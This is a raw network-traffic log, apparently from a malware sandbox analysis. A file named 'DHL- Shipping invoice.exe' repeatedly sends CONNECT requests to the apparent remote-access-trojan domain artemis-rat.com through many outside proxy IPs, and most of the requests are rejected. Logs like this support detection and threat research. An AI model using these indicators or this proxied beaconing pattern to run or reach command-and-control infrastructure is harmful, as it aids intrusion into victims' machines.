                            Mar 12, 2024 08:37:02.690908909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            914192.168.2.452822185.82.218.5210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.691298008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            915192.168.2.452821213.14.32.6741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.691615105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            916192.168.2.452911172.67.182.169806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.697514057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.785118103 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            917192.168.2.452849162.214.225.223634526484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.701673031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.249937057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.750483036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            918192.168.2.45287472.195.101.9941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.703855991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            919192.168.2.45285881.19.141.20985066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.704174995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            920192.168.2.452921172.67.150.173806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.704538107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.791441917 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            921192.168.2.452798203.95.198.3580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.714443922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            922192.168.2.452806103.23.101.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.716809034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            923192.168.2.452936172.67.181.85806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.725575924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.812819004 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            924192.168.2.452820121.159.146.251806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.730376005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.009252071 CET310INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 150
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            925192.168.2.452943185.162.231.226806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.731820107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.818749905 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            926192.168.2.45054845.81.232.17146696484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.732131958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765741110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859488964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859808922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.859395981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.952918053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.953012943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.952886105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            927192.168.2.452537194.182.163.11731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.736057043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.904027939 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            928192.168.2.452952104.25.234.81806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.738228083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.825823069 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            929192.168.2.45279958.18.43.34108006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.743454933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            930192.168.2.450641185.109.184.150560676484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.744673967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765742064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859493017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859788895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.859313965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.952989101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:38.953068018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            931192.168.2.452801103.49.114.19580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.744848967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            932192.168.2.452804103.120.6.46806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.755866051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            933192.168.2.452995172.64.207.185806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.821484089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.908751011 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            934192.168.2.452897162.62.54.189100226484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.821525097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.262387037 CET174INHTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8Proxy-Authenticate: Basic realm="proxy"errorMsg: user forbidden,userip=191.96.150.227,info=insufficient flo
                            Data Raw:
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            935192.168.2.450602103.215.139.3264376484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.821949005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.843816996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941554070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.046966076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.046787977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.047367096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.159209967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.156925917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.234647036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            936192.168.2.453010104.20.51.99806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.822360992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.910240889 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
